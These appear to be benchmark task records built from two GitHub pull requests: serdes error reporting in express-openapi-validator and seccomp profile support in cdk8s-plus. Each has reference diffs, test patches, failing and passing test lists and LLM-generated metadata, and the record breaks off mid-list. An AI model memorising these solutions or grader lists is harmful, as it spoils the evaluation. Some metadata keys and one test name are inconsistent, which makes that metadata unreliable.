cdimascio: @pilerou, can you separate the bug fix from the new feature i'd like to get the bug fix in immediately, but need more time to consider the feature request. pilerou: Hi @cdimascio I did the revert in my fork on origin/master linked to this PR. There's only fixes now on my master branch. I created a branch for the new feature #683 : https://github.com/pilerou/express-openapi-validator/tree/initAjv Do you want me to create another separated Pull request or do you want to have a look in my branch ? cdimascio: @pilerou please create another PR. makes the merge and diff simpler to review
cdimascio__express-openapi-validator-684
diff --git a/src/framework/ajv/index.ts b/src/framework/ajv/index.ts index bd5a6f7..ca879d4 100644 --- a/src/framework/ajv/index.ts +++ b/src/framework/ajv/index.ts @@ -59,6 +59,15 @@ function createAjv( obj[propName] = sch.deserialize(data); } catch(e) { + (<ajv.ValidateFunction>validate).errors = [ + { + keyword: 'serdes', + schemaPath: data, + dataPath: path, + message: `format is invalid`, + params: { 'x-eov-serdes': propName }, + }, + ]; return false; } } @@ -108,6 +117,15 @@ function createAjv( obj[propName] = sch.serialize(data); } catch(e) { + (<ajv.ValidateFunction>validate).errors = [ + { + keyword: 'serdes', + schemaPath: data, + dataPath: path, + message: `format is invalid`, + params: { 'x-eov-serdes': propName }, + }, + ]; return false; } }
Patch on serdes test and allow to use generated AJV out of Express usage It fixes a bug in serdes unit test by sending a more human readable message AND it could allow to use the generated Ajv behind OpenApiValidator out of an express usage. It could be great, for example, to validate websocket request...
**Title** Improve serdes error reporting and expose generated AJV for non‑Express usage **Problem** - Serdes unit tests receive unhelpful error output, making debugging difficult. - The AJV instance created by the OpenAPI validator is tightly coupled to Express, preventing reuse in other contexts such as WebSocket validation. **Root Cause** - When serialization or deserialization fails, no detailed AJV error information is attached, resulting in a generic failure. - The generated AJV validator is not exported for external consumption. **Fix / Expected Behavior** - Attach a custom AJV error object containing a clear message and identifying the offending property whenever serdes conversion fails. - Ensure the error includes a dedicated keyword and relevant parameters for easier identification. - Make the generated AJV validator usable independently of the Express framework. - Preserve existing validation logic while providing richer error details. **Risk & Validation** - Changing error handling could impact callers that rely on the previous generic failure; verify backward compatibility. - Run the serdes unit tests to confirm the new, human‑readable messages appear as expected. - Add integration tests that invoke the generated AJV validator outside Express (e.g., for WebSocket payloads) to ensure correct operation.
684
cdimascio/express-openapi-validator
diff --git a/test/serdes.spec.ts b/test/serdes.spec.ts index 3f822f8..0260326 100644 --- a/test/serdes.spec.ts +++ b/test/serdes.spec.ts @@ -307,13 +307,13 @@ describe('serdes serialize response components only', () => { .expect(500) .then((r) => { console.log(r); - expect(r.body.message).to.equal('d.toISOString is not a function'); + expect(r.body.message).to.equal('.response.creationDate format is invalid'); })); /* FIXME Manage format validation after serialize ? I can serialize using a working serialize method but that respond a bad format it('should throw error 500 on an object that serialize to a bad string format', async () => - + request(app) .get(`${app.basePath}/users/5fdefd13a6640bb5fb5fa925`) .query({baddateresponse : 'functionBadFormat'}) @@ -322,7 +322,7 @@ describe('serdes serialize response components only', () => { console.log(r.body); expect(r.body.message).to.equal('Something saying that date is not date-time format'); })); - + */ });
[ "should throw error 500 on invalid object type instead of Date expected" ]
[ "create campaign should return 201", "create campaign should return 400", "create campaign should return 200", "should return 200", "should return 201", "does not mutate the API specification", "does not validate responses which are not present in the spec", "should allow additional / unknown properties properties", "should return 400 on missing required prop (when using additional props explode object)", "should return 400 if additionalProperties=false, and type is invalid", "should return 400 if additionalProperties=false, but extra props sent", "should return 200 if additonalProperities=true and extra props are sent", "should not validate schema for requests since schema is validated on startup", "should not validate schema for response since schema is validated on startup", "should not validate schema for preprocessor since schema is validated on startup", "should not validate schema for multipar since schema is validated on startup", "should set serdes deserialize", "should set serdes serialize", "should set serdes serialize and deserialize", "should set serdes serialize and deserialize separately", "should validate allOf", "should fail validation due to missing required id field", "should fail validation due to missing required name field", "adds \"Allow\" header to 405 - Method Not Allowed", "should validate circular ref successfully", "should return 400 since is_cat is passed as string not boolean", "should return 400 when age is passed as string, but number is expected", "should return 400 when age (number) is null", "should return 200 when all are typed correctly", "should keep is_cat as boolean", "should return 400 when is_cat requires string type \"true\", but boolean specified", "should handle components.parameter $refs", "should match wildcard type */*", "should match wildcard type application/*", "should null if no accept specified", "should match media type if charset is not specified in accepts", "should match media type if charset is specified in accepts, but charset not defined in schema", "should return 200 if testDateTimeProperty is provided with invalid, but correctly formatted date time and default validation is enabled (past compatibility)", "should return 400 if testDateTimeProperty is provided with incorrectly formatted date time and default validation enabled (past compatibility)", "should return 200 if testDateTimeProperty is provided with incorrectly formatted date time and format validation disabled", "should return 200 if testDateTimeProperty is provided with valid date time and full validation enabled", "should return 400 if testDateTimeProperty is provided with invalid date time and full validation enabled", "should use default export operation", "should throw 400 if servers are empty and request is malformed", "should be able to use an endpoint with some nested paths $ref", "should be able to use an endpoint with some nested paths $ref 2", "should handle float type with negative", "should handle float type with 0 value", "should handle float type with positive value", "should require the query parameter number_id has 3 digits", "should require the query parameter string_id has 3 letters", "should return success if the query parameter string_id has 3 letters", "should return 400 missing required header", "should return 400 invalid required header", "should return 200 for valid headers", "should throw 400 if required header is missing", "should find appropriate request body in spec by contentType with charset (compatibility)", "should find appropriate request body in spec by contentType with charset", "should match mediatype when charset case does not match the case defined in the spec", "should be an instance of BadRequest", "should be an instance of InternalServerError", "should be an instance of UnsupportedMediaType", "should be an instance of RequestEntityTooLarge", "should be an instance of MethodNotAllowed", "should be an instance of NotFound", "should be an instance of Unauthorized", "should be an instance of Forbidden", "should ignore path and return 200, rather than validate", "should not ignore path and return 404", "should validate a path within the base path that is not ignored", "should validate a route defined in openapi but not express with invalid params", "should return 404 if route is defined in openapi but not express and params are valid", "should propagate spec errors when validateApiSpec is true", "should fail gracefully when validateApiSpec is false", "should throw 400 when required multipart file field", "should throw 400 when required form field is missing during multipart upload", "should validate x-www-form-urlencoded form_pa and and form_p2", "should throw 405 get method not allowed", "should throw 415 unsupported media type", "should return 400 when improper range specified", "should validate a request body with a schemaObject $ref", "should validate a requestBody $ref", "should validate a requestBody $ref that contains a schemaObject $ref", "should validate application/octet-stream file and metadata", "should validate multipart file and metadata", "should fail, because response does not satisfy schema", "should pass if /components is not present", "should allow null to be set (name: nullable true)", "should not fill an explicity null with default when coerceTypes is false", "should fill unspecified field with default when coerceTypes is false", "should fail if required and not provided (nullable true)", "should fail if required and not provided (nullable false", "should fail if required and provided as null when nullable is false", "should allow nullable object", "should not coerce a nullable int", "should return 200 for dog", "should return 200 for cat and populate default color", "should return 400 for dog with cat props", "should return 400 a bad discriminator", "should return 200 for puppy", "should return 200 for cat", "should return 200 for kitty", "should return 200 for Dog", "should return 200 for Cat", "should return 200 one first oneOf option", "should return 200 one second oneOf option", "should return 400 for invalid oneOf option", "should return 200 on first oneOf (b) option", "should return 200 on second oneOf (b) option", "should return 400 for invalid oneOf (b) option", "post type anyOf (without readonly id) should pass", "post type oneOf (without readonly id) should pass", "post type anyof without providing the single required readonly property should pass", "should fail if posting anyof with bad discriminator", "should throw 400 on missing required query parameter", "should respond with json on proper get call", "should return 400 with unknown query parameter", "should return 400 when non-urlencoded JSON in query param", "should return 200 when JSON in query param", "should return 400 when improper JSON in query param", "should return 400 when comma separated array in query param", "should return 400 when comma separated array in query param is not url encoded", "should return 200 when separated array in query param", "should return 400 when improper separated array in query param", "should return 200 when array explode in query param", "should return 400 when improper array explode in query param", "should return 400 if required body is missing", "should return 400 if required \"name\" property is missing", "should return 200 when post props are met", "should not validate a route defined in express, but not under an openapi basepath", "should return 400 if route is defined in openapi but not express and is called with invalid parameters", "should return 404 if route is defined in swagger but not express", "should throw 404 on a route defined in express, but not documented in the openapi spec", "should return 405 if route is defined in swagger but not express and the method is invalid", "should return 404 for route not defined in openapi or express", "should return 404 for a route defined in express, but not documented in openapi", "should return 415 when media type is not supported", "should return 405 when method is not allows", "should return 400 when path param should be int, but instead is string", "should return 400 an invalid enum value is given", "should handle multiple path params with coereion", "should return 200 and get the id from the response", "should not install handlers when nothing provided", "should use the default handler when string provided", "can use a custom operation resolver", "should recognize mapped operation", "create document should return 201", "create document should return 201 with empty body", "return 415", "should return 400 if pathLevel query parameter is not provided", "should return 400 if operationLevel query parameter is not provided", "should return 400 if neither operationLevel, nor pathLevel query parameters are provided", "should return 200 if both pathLevel and operationLevel query parameter are provided", "should match on users test", "static routes should be matched before dynamic routes", "should url decode path parameters (type level)", "should url decode path parameters (path level)", "should handle path parameter with style=simple", "should handle :'s in path parameters", "should sort dynamic leafs after static leafs", "should sort dynamic inner paths after static inner paths", "should pass if known query params are specified", "should not fail if unknown query param is specified", "should fail if operation overrides x-allow-unknown-query-parameters=false", "should reject any query param when endpoint declares none", "should return 200 if no query params are supplied", "should fail if unknown query param is specified", "should return 200 if operation overrides x-allow-unknown-query-parameters=true", "should not allow empty query param value", "should allow empty query param value with allowEmptyValue: true", "should succeed when query param 'name' has empty value and sets allowEmptyValue: true", "should not allow reserved characters", "should may allow reserved characters when allowedReserved: true", "should not allow read only properties in requests", "should allow read only properties in responses", "should not allow read only inlined properties in requests", "should not allow read only properties in requests (nested schema $refs)", "should not allow read only properties in requests (deep nested schema $refs)", "should pass validation if required read only properties to be missing from request ($ref)", "should pass validation if required read only properties to be missing from request (inlined)", "should pass validation if required read only properties to be missing from request (with charset)", "should fail validation if required read only properties is missing from the response", "should require readonly required property in response", "should return 500 if readonly required property is missing from response", "should return 415 for undeclared media type", "should return 200 if text/plain request body is satisfied", "should return 200 if text/html request body is satisfied by */*", "should return 200 if application/ld+json request body is satisfied by application/*", "should return 200 if application/vnd.api+json; type=two request body is validated agains the corrent schema", "should return 400 if testProperty body property is not provided", "should return 200 if testProperty body property is provided", "should return 400 if array is passed (instead of object) and the array includes an object that meets requirements", "should return 200 if a json suffex is used for content-type", "should return 500 if additional response body property is returned", "should return 400 if an additional property is encountered", "should return 200 if coercion is enabled and the type is correct", "should return 200 if coercion is enabled and the type is incorrect but can be coerced", "should return 400 if coercion is enabled and the type is incorrect and cannot be coerced", "should return 200 if coercion is disabled and the type is correct", "should return 400 if coercion is disabled and the type is incorrect", "should validate and serialize date-time", "should validate and serialize date", "should be able to return `true` as the response body", "should coerce id from string to number", "should validate 200 using explicit response", "should validate undeclared 400 using default response", "custom error handler invoked if response field has a value of incorrect type", "custom error handler not invoked on valid response", "returns error if custom error handler throws", "should fail if response field has a value of incorrect type", "should remove additional properties when set false", "should remove nested additional prop if additionalProperties is false", "should pass if response is a list", "should return 200 on valid responses 200 $ref", "should fail if response is array when expecting object", "should return 200 if returns expect object (using allOf) with type object", "should fail if response is empty object", "should fail if response is empty", "should return throw 500 on invalid error response", "should return 204 for endpoints that return empty response", "should fail if response is not empty and an empty response is expected", "should fail if additional properties are provided when set false", "should pass if value is null", "should be able to return `false` as the response body", "should validate the using default (in this case the error object)", "should throw error when default response is invalid", "should return an error if field type is invalid", "should return 404 for undocumented route when using Router", "should return 200 if no security", "should skip validation, even if auth header is missing for basic auth", "should skip security validation, even if auth header is missing for bearer auth", "should return 401 if cookie auth property is missing", "should return 401 if apikey handler throws exception", "should return 401 if apikey handler returns false", "should return 401 if apikey handler returns Promise with false", "should return 401 if cookie auth handler returns Promise with false", "should return 401 if apikey handler returns Promise reject with custom message", "should return 401 if apikey header is missing", "should return 200 if apikey header exists and handler returns true", "should return 404 if apikey header exists and handler returns true but path doesnt exist", "should return 401 if auth header is missing for basic auth", "should return 401 if auth header has malformed basic auth", "should return 401 if auth header is missing for bearer auth", "should return 401 if auth header has malformed bearer auth", "should return 200 if bearer auth succeeds", "should return 200 if oauth2 auth succeeds", "should return 403 if oauth2 handler throws 403", "should return 200 if openid auth succeeds", "should return 500 if security handlers are defined, but not for all securities", "should return 200 if api_key or anonymous and no api key is supplied", "should return 200 if api_key or anonymous and api key is supplied", "should return 401 if not X-Api-Key is missing", "should return 401 if Bearer token is missing", "should return 200 when X-Api-Key and Bearer token are present", "should return 200 when Basic auth is present", "should inherit top level security and return 401 if apikey header is missing", "should return 200 if apikey exists", "should return 404 if apikey exist, but path doesnt exist", "should return 405 if apikey exist, but invalid method used", "should return 200 if apikey exist as query param", "should return 200 if apikey exist as query param with another query parmeter in the request", "should return 200 if apikey exist as query param with no query parmeter in the request but in the spec", "should return 200 if apikey or anonymous", "should override api key with bearer and return 401 if bearer is missing", "should override api key with bearer and return 200", "should override api key with anonymous", "should control BAD id format and throw an error", "should control GOOD id format and get a response in expected format", "should POST also works with deserialize on request then serialize en response", "should POST throw error on invalid schema ObjectId", "should POST throw error on invalid schema Date", "should POST throw error for deserialize on request of non-string format", "should explode deepObject and set default", "should explode deepObject query params", "should explode deepObject query params (optional query param)", "should use defaults when empty", "should use defaults for values not provided", "should deserialize object", "should not deserialize when non-object", "should fail on validation, not parsing", "should explode query param object e.g. tag_ids, state as query params", "should explode deepObject query params with default values", "should explode deepObject $ref query params with default values", "should validate server path with version variable, v2 and petstore", "should validate server path with version variable, v2 and storeofpets", "should skip validation of api path with invalid enum value v3, and valid value petstore", "should validate server path with version variables, v2 and petstore", "should validate server path with version variables, v2 and storeofpets", "should skip validation of api path with invalid variable value, v2, and valid variable petstore", "should return 200 for valid request with unknown format", "should allow path param without wildcard", "should allow path param with slashes \"/\" using wildcard", "should return not found if no path is specified", "should return 200 when wildcard path includes all required params", "should 400 when wildcard path is missing a required query param", "should return 200 if root of an existing wildcard route is defined", "should not allow ready only inlined properties in requests", "should not allow write only inlined properties in responses", "should return 200 if no write-only properties are in the responses", "should not allow write only properties in responses (nested schema $refs)" ]
No new interfaces are introduced.
MIT
{ "base_image_name": "node_20", "install": [ "npm ci", "npm run compile" ], "log_parser": "parse_log_js", "test_cmd": "npx mocha -r source-map-support/register -r ts-node/register --files --recursive -R spec test/**/*.spec.ts 2>&1 | sed 's/\\x1b\\[[0-9;]*m//g'" }
{ "num_modified_files": 1, "num_modified_lines": 18, "pr_author": "pilerou", "pr_labels": [], "llm_metadata": { "code": "B2|B4", "code_quality": null, "confidence": 0.78, "detected_issues": { "B1": false, "B2": true, "B3": false, "B4": true, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [], "intent_completeness": "partial", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue asks to fix a failing serdes unit test by producing a more readable error message and to expose the generated AJV instance for non‑Express use. The provided test patch only changes the expected error string without explaining why that exact wording is required, and the golden patch shows the actual code change needed to set custom AJV errors. Because the specification does not state the required message format or the exact exposure mechanism, the intent is only partially described and the test expectation is implicit, leading to ambiguous specification and implicit naming issues. Therefore the task is classified as B4 (with a secondary B2 signal).", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [ "Test expects a specific error message string ('.response.creationDate format is invalid') that is not mentioned in the issue description.", "The test contains a commented‑out block with a FIXME that is unrelated to the described fix." ], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
98796b2c914ec340bd7c17772cdba3e2a5c3218a
2024-08-08 11:02:54
iliapolo: Also see https://github.com/cdk8s-team/cdk8s-plus/pull/4500#issuecomment-2283286630. Thanks! serhatcetinkaya: @iliapolo thanks for the review, #4500 is merged 👍 I sent a fix to separate the tests for this one, can you please also take a look at #4483 when you have time? thanks in advance iliapolo: @serhatcetinkaya this is also need to update from upstream
cdk8s-team__cdk8s-plus-4499
diff --git a/src/container.ts b/src/container.ts index 77b8d202..f145ff0f 100644 --- a/src/container.ts +++ b/src/container.ts @@ -181,6 +181,37 @@ export enum Capability { WAKE_ALARM = 'WAKE_ALARM', } +export enum SeccompProfileType { + /** + * A profile defined in a file on the node should be used + */ + LOCALHOST = 'Localhost', + /** + * The container runtime default profile should be used + */ + RUNTIME_DEFAULT = 'RuntimeDefault', + /** + * No profile should be applied + */ + UNCONFINED = 'Unconfined', +} + +export interface SeccompProfile { + /** + * localhostProfile indicates a profile defined in a file on the node should be used. + * The profile must be preconfigured on the node to work. Must be a descending path, + * relative to the kubelet's configured seccomp profile location. + * Must only be set if type is "Localhost". + * + * @default - empty string + */ + readonly localhostProfile?: string; + /** + * Indicates which kind of seccomp profile will be applied + */ + readonly type: SeccompProfileType; +} + export interface ContainerSecutiryContextCapabilities { /** * Added capabilities @@ -252,6 +283,13 @@ export interface ContainerSecurityContextProps { * @default none */ readonly capabilities?: ContainerSecutiryContextCapabilities; + + /** + * Container's seccomp profile settings. Only one profile source may be set + * + * @default none + */ + readonly seccompProfile?: SeccompProfile; } /** @@ -331,8 +369,12 @@ export class ContainerSecurityContext { public readonly group?: number; public readonly allowPrivilegeEscalation?: boolean; public readonly capabilities?: ContainerSecutiryContextCapabilities; + public readonly seccompProfile?: SeccompProfile; constructor(props: ContainerSecurityContextProps = {}) { + if (props.seccompProfile?.localhostProfile && props.seccompProfile.type != SeccompProfileType.LOCALHOST) { + throw new Error('localhostProfile must only be set if type is "Localhost"'); + } this.ensureNonRoot = props.ensureNonRoot ?? true; this.privileged = props.privileged ?? false; this.readOnlyRootFilesystem = props.readOnlyRootFilesystem ?? true; @@ -340,6 +382,7 @@ export class ContainerSecurityContext { this.group = props.group; this.allowPrivilegeEscalation = props.allowPrivilegeEscalation ?? false; this.capabilities = props.capabilities; + this.seccompProfile = props.seccompProfile; } /** @@ -354,6 +397,7 @@ export class ContainerSecurityContext { readOnlyRootFilesystem: this.readOnlyRootFilesystem, allowPrivilegeEscalation: this.allowPrivilegeEscalation, capabilities: this.capabilities, + seccompProfile: this.seccompProfile, }; }
feat(container): support seccompProfile in container security context this adds support for SeccompProfile in container security context. please refer to: https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.30/#seccompprofile-v1-core this should also be backported to 1.29 and 1.28 main branches
**Title** Add seccomp profile support to container security context **Problem** Containers could not specify a Seccomp profile, preventing users from applying fine‑grained syscall filtering required by many security policies. The lack of this field also meant generated manifests were incomplete for workloads that rely on seccomp. **Root Cause** The container security context model did not expose any representation for seccomp configuration. **Fix / Expected Behavior** - Introduce a representation of seccomp profile types (runtime default, localhost, unconfined). - Allow a container security context to include an optional seccomp profile definition with a type and, when appropriate, a localhost profile path. - Enforce that a localhost profile can only be set when the type is *Localhost*. - Ensure the seccomp profile data is emitted in the rendered Kubernetes manifest under the container’s securityContext. - Preserve default behavior when no seccomp profile is provided. **Risk & Validation** - Verify that existing manifests remain unchanged when the seccomp profile is omitted. - Add unit tests to confirm proper validation of mismatched type/profile combinations and correct serialization. - Run integration tests against supported Kubernetes versions to ensure the new fields map to the official API without regressions.
4,499
cdk8s-team/cdk8s-plus
diff --git a/test/container.test.ts b/test/container.test.ts index f1795cd4..4b4a2ed2 100644 --- a/test/container.test.ts +++ b/test/container.test.ts @@ -1,7 +1,7 @@ import * as cdk8s from 'cdk8s'; import { Size, Testing } from 'cdk8s'; import * as kplus from '../src'; -import { Container, Cpu, Handler, ConnectionScheme, Probe, k8s, Capability, ContainerRestartPolicy } from '../src'; +import { Container, Cpu, Handler, ConnectionScheme, Probe, k8s, Capability, ContainerRestartPolicy, SeccompProfileType } from '../src'; describe('EnvValue', () => { @@ -778,6 +778,7 @@ test('default security context', () => { runAsUser: container.securityContext.user, allowPrivilegeEscalation: container.securityContext.allowPrivilegeEscalation, capabilities: container.securityContext.capabilities, + seccompProfile: container.securityContext.seccompProfile, }); }); @@ -799,6 +800,9 @@ test('custom security context', () => { Capability.BPF, ], }, + seccompProfile: { + type: SeccompProfileType.RUNTIME_DEFAULT, + }, }, }); @@ -809,7 +813,37 @@ test('custom security context', () => { expect(container.securityContext.group).toEqual(2000); expect(container.securityContext.capabilities?.add).toEqual(['AUDIT_CONTROL']); expect(container.securityContext.capabilities?.drop).toEqual(['BPF']); + expect(container.securityContext.seccompProfile?.type).toEqual('RuntimeDefault'); + +}); +test('seccompProfile localhostProfile can not be used if type is not Localhost', () => { + + const container = new Container({ + image: 'image', + securityContext: { + seccompProfile: { + type: SeccompProfileType.LOCALHOST, + localhostProfile: 'localhostProfile', + }, + }, + }); + + const spec = container._toKube(); + expect(spec.securityContext?.seccompProfile?.localhostProfile).toEqual('localhostProfile'); +}); + +test('seccompProfile localhostProfile must only be set if type is Localhost', () => { + + expect(() => new Container({ + image: 'image', + securityContext: { + seccompProfile: { + type: SeccompProfileType.UNCONFINED, + localhostProfile: 'localhostProfile', + }, + }, + })).toThrowError('localhostProfile must only be set if type is "Localhost"'); }); test('can configure a postStart lifecycle hook', () => {
[ "Can add only resource requests", "Can add only resource limits", "Can add only limits and requests on memory", "Can add only limits and requests on cpu", "Can add only limits and requests on emphemeral-storage", "Can add only limits on emphemeral-storage", "seccompProfile localhostProfile can not be used if type is not Localhost", "seccompProfile localhostProfile must only be set if type is Localhost", "can configure a postStart lifecycle hook", "can configure a preStop lifecycle hook", "Can be created from value", "Can be created from config map name", "Can be created from secret value", "Can be created from ISecret.envValue", "Can be created from new secret.envValue", "Cannot be created from missing required process env", "Can be created from missing optional process env", "Can be created from existing process env", "Can be created from fieldRef", "Can be created from fieldRef with key", "Can not be created from fieldRef without key", "Can be created from resourceFieldRef", "Can be created from resourceFieldRef with divisor", "Can be created from resourceFieldRef with container", "cannot configure identical ports and protocols at instantiation", "can configure identical ports with different protocols at instantiation", "cannot add an already existing port number with identical protocol", "can add an already existing port number with a different protocol", "cannot add an already existing port name", "can configure multiple ports", "portNumber is equivalent to port", "Instantiation properties are all respected", "Must use container props", "Can add environment variable", "can add environment variables from a source", "can add environment variables from a secret", "Can mount container to volume", "can mount container to a pv", "mount options", "mount from ctor", "\"startupProbe\" property has defaults if port is provided", "\"startupProbe\" property is undefined if port is not provided", "\"restartPolicy\" property can be used to define restartPolicy", "\"readiness\", \"liveness\", and \"startup\" can be used to define probes", "Can add resource limits and requests" ]
[ "fromCommand", "fromHttpGet", "fromTcpSocket", "defaultChild", "defaults", "can select namespaces", "can select all namespaces", "defaults to the container port", "specific port", "options", "minimal usage", "specific port and hostname", "can grant permissions on imported", "minimal", "with data", "with binaryData", "with binaryData and data", "\"binaryData\" and \"data\" cannot share keys", "addData()/addBinaryDataq() can be used to add data", "addData() and addBinaryData() throw if key already used", "addFile() adds local files to the config map", "metadata is synthesized", "can configure an immutable config map", "sub-directories are skipped", "keys are based on file names", "\"prefix\" can be used to prefix keys\"", "\"exclude\" exclusion via globs", "default child", "custom", "a label selector is automatically allocated", "no selector is generated if \"select\" is false", "can select by label", "Can be isolated", "Can mutate metadata", "can create a RoleBinding from a Role", "can create a RoleBinding from a ClusterRole", "can call bindInNamespace multiple times", "can create a ClusterRoleBinding from a ClusterRole", "can bind a ServiceAccount to a role", "can add subjects to a RoleBinding after creating it", "can be imported", "can be reserved with default storage class", "can be reserved with a custom storage class", "reserved claim is created in the same namespace as the volume", "throws if reserved twice", "can be bound to a claim at instantiation", "can be bound to a claim post instantiation", "no-ops if bounded twice to the same claim", "throws if bounded twice to different claims", "default configuration", "custom configuration", "Allows setting all options", "Applies default restart policy to pod spec", "Does not modify existing restart policy of pod spec", "Synthesizes spec lazily", "ipv4", "throws on invalid ipv4 cidr", "ipv6", "throws on invalid ipv6 cidr", "anyIpv4", "anyIpv6", "tcp", "tcpRange", "allTcp", "udp", "udpRange", "allUcp", "of", "can create a policy for a managed pod", "can create a policy for a managed workload resource", "can create a policy for selected pods", "can create a policy for all pods", "can create a policy that allows all ingress by default", "can create a policy that denies all ingress by default", "can create a policy that allows all egress by default", "can create a policy that denies all egress by default", "cannot create a policy for a selector that selects pods in multiple namespaces", "cannot create a policy for a selector that selects pods in namespaces based on labels", "policy namespace defaults to selector namespace", "can add ingress from an ip block", "can add ingress from a managed pod", "can add ingress from a managed workload resource", "can add ingress from pods selected without namespaces", "can add ingress from pods selected with namespaces selected by labes", "can add ingress from pods selected with namespaces selected by names", "can add ingress from all pods", "can add ingress from managed namespace", "can add ingress from selected namespaces", "can add ingress from all namespaces", "can add egress to an ip block", "can add egress to a managed pod", "can add egress to a managed workload resource", "can add egress to pods selected without namespaces", "can add egress to pods selected with namespaces selected by labes", "can add egress to pods selected with namespaces selected by names", "can add egress to all pods", "can add egress to managed namespace", "can add egress to selected namespaces", "can add egress to all namespaces", "targets a deployment that has containers with volume mounts", "creates HPA with 2 default scaleUp policies and 1 default scaleDown policy, when all other scaleUp and scaleDown options are provided", "creates HPA with scaleUp and scaleDown policies with the default 15 second periodSeconds, when policies are provided without duration option", "creates HPA with two different scaling strategies, when provided a scaleUp strategy of Max and scaleDown strategy of Min", "creates HPA with CPU ContainerResource metric, when provided a Metric.containerCpu()", "creates HPA with Memory ContainerResource metric, when provided a Metric.containerMemory()", "creates HPA with Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with Ephemeral Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with external metric, when provided a Metric.external()", "creates HPA with object metric, when provided a Metric.object()", "creates HPA with pods metric, when provided a Metric.pods()", "creates HPA with Resource CPU metric, when provided a Metric.resourceCpu()", "creates HPA with Resource Memory metric, when provided a Metric.resourceMemory()", "creates HPA with Resource Storage metric, when provided a Metric.resourceStorage()", "creates HPA with Resource Ephemeral Storage metric, when provided a Metric.resourceEphemeralStorage()", "creates HPA with Resource CPU metric targeting 70% average utilization, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting 47.2 average value, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting the exact value of 29.5, when provided a MetricTarget.value()", "creates HPA, when target is a deployment", "creates HPA, when target is a StatefulSet", "creates HPA, when minReplicas is same as maxReplicas", "creates HPA with expected spec, when metrics, scaleUp, and scaleDown are all configured", "creates HPA, when metrics are not provided and one of the two target containers does not have any resources limits/requests", "throws error at synth, when metrics are not provided and target container does not have resource constraints specified", "throws error, when minReplicas is more than maxReplicas", "throws error, when scaleUp.stabilizationWindow is more than 1 hour", "throws error, when scaleDown.stabilizationWindow is more than 1 hour", "throws error, when scaleUp.stabilizationWindow is -1", "throws error, when scaleDown.stabilizationWindow is -1 seconds", "throws error, when scaleUp policy has a duration longer than 30 minutes", "throws error, when scaleDown policy has a duration longer than 30 minutes", "throws error, when scaleUp policy has a duration set to 0", "throws error, when scaleDown policy has a duration set to 0", "throws error, when scaleUp policy has a duration set to -10 minutes", "throws error, when scaleDown policy has a duration set to -10 minutes", "throws error at synth, when Deployment target has replicas defined", "throws error at synth, when StatefulSet target has replicas defined", "fails with two volumes with the same name", "fails adding a volume with the same name", "fails with a container that has mounts with different volumes of the same name", "can configure multiple mounts with the same volume", "Can add container post instantiation", "Can attach an existing container post instantiation", "Must have at least one container", "Can add volume post instantiation", "Automatically adds volumes from container mounts", "init containers cannot have liveness probe", "init containers cannot have readiness probe", "init containers cannot have startup probe", "can specify init containers at instantiation", "can add init container post instantiation", "init container names are indexed", "automatically adds volumes from init container mounts", "default security context", "custom security context", "custom host aliases", "default dns settings", "custom dns settings", "throws if more than 3 nameservers are configured", "throws if more than 6 search domains are configured", "throws if no nameservers are given when dns policy is set to NONE", "can configure auth to docker registry", "auto mounting token defaults to true", "auto mounting token can be disabled", "can select pods", "can pass an existing secret as the docker auth", "can add hostNetwork to pod", "pod hostNetwork is not added by default", "default termination grace period", "custom termination grace period", "custom termination grace period - minutes", "Containers should not specify \"restartPolicy\" field", "only NO_EXECUTE taint queries can specify eviction", "can tolerate tainted nodes", "can be assigned to a node by name", "can be attracted to a node by selector - default", "can be attracted to a node by selector - custom", "can be co-located with a managed pod - default", "can be co-located with a managed pod - custom", "can be co-located with an unmanaged pod - default", "can be co-located with an unmanaged pod - custom", "can be separated from a managed pod - default", "can be separated from a managed pod - custom", "can be separated from an unmanaged pod - default", "can be separated from an unmanaged pod - custom", "can allow to ip block", "can isolate pod", "can allow to managed pod", "can allow to managed workload resource", "can allow to pods selected without namespaces", "can allow to pods selected with namespaces selected by names", "cannot allow to pods selected with namespaces selected by labels", "cannot allow to pods selected in all namespaces", "can allow to all pods", "can allow to managed namespace", "can allow to namespaces selected by name", "cannot allow to namespaces selected by labels", "can allow to peer across namespaces", "can allow to multiple peers", "cannot allow to the same peer twice", "allow to create an ingress policy in source namespace when peer doesnt define namespaces", "allow to with peer isolation creates only ingress policy on peer", "allow to with pod isolation creates only egress policy on pod", "allow to defaults to peer container ports", "can allow from ip block", "can allow from managed pod", "can allow from managed workload resource", "can allow from pods selected without namespaces", "can allow from pods selected with namespaces selected by names", "cannot allow from pods selected with namespaces selected by labels", "cannot allow from pods selected in all namespaces", "can allow from all pods", "can allow from managed namespace", "can allow from namespaces selected by name", "cannot allow from namespaces selected by labels", "can allow from peer across namespaces", "can allow from multiple peers", "cannot allow from the same peer twice", "allow from create an ingress policy in source namespace when peer doesnt define namespaces", "allow from with peer isolation creates only ingress policy on peer", "allow from with pod isolation creates only egress policy on pod", "allow from defaults to peer container ports", "can grant read permissions to a user", "can grant read permissions to a group", "can grant read permissions to a service account", "can grant read permissions to another pod", "can grant read permissions to workload", "can grant read permissions twice with different subjects", "cannot grant permissions twice with same subject", "can be bounded to a volume at instantiation", "can be bounded to a volume post instantiation", "no-ops if bounded twice to the same volume", "throws if bounded twice to different volumes", "role can bind to 